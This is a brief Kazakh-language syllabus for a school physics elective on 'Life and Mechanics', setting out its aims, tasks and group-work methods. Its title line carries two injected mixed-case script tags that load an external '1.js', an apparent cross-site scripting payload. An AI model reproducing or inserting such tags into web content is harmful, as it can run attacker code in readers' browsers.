Элективті курс «Тіршілік және механика»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Түсініктеме.
Физика сабағы ғылыми және эксперименттік ілімдер қатарына жатады. Сондықтан оқушыларға теориялық ақпарат беру және эксперимент жасау арқылы қызықтырып , шығармашылық қабілетін дамыту қажет. Оқулықта берілген материалдарды түсініп, қолдану үшін табиғат құбылыстарын түсінуде көмек болады.
Мақсаты:
Физиканың даму тарихы мен ғалымдырдың еңбектерімен танысу арқылы пәнге деген қызығушылықты арттыру. Тәжірибе жасау барысында, құралдармен жете танысып, танымдық қабілеттерін ерекшелеу. Физиканың заңдарының шығу тарихын зерттеу, қызықты проблемалық сұрақтарды шеше білу және шығармашылық ізденіс қабілеттерінің аясын дамыту.
Міндеттері:
Физикалық аспаптармен таныстыру, зерттеушілік қабілеттерін арттыру ,сөйлеу мәдениетін ерекшелеу. Физикадағы заңдар мен құбылыстардың байланысын орната білу,түсіну. Эксперименттің нәтижелеріне қорытынды жасай алу. Қазіргі физика және техника салаларындағы жаңалықтарды оқу, бөлісу. Отандық және өз еліміздің ғалымдарымен танысу барысында адами қасиеттерді бойларында дарыту.
Пайдаланылатын әдістер:
1. Топпен эксперимент жасау.
2. Жеке және топтық жұмыс.
3. Реферат пен презентациялар дайындатып, ой бөлісу.